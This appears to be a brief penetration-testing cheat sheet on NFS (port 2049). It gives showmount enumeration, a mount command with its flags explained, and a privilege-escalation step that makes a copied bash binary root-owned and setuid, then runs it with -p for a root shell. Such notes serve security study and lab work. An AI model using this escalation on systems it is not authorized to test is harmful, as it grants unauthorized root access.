Port 2049 - NFS

Enumerating NFS

/usr/sbin/showmount -e [IP]

sudo mount -t nfs IP:share /tmp/mount/ -nolock

-t type

IP ip of the targer

share share name

/tmp/mount/ directory to mount share

--nolock Specifies not to use NLM locking

Fo priv esc change its owner and mode

chown root bash
chmod +s bash

Now execute it with -p

./bash -p

Last updated 1 year ago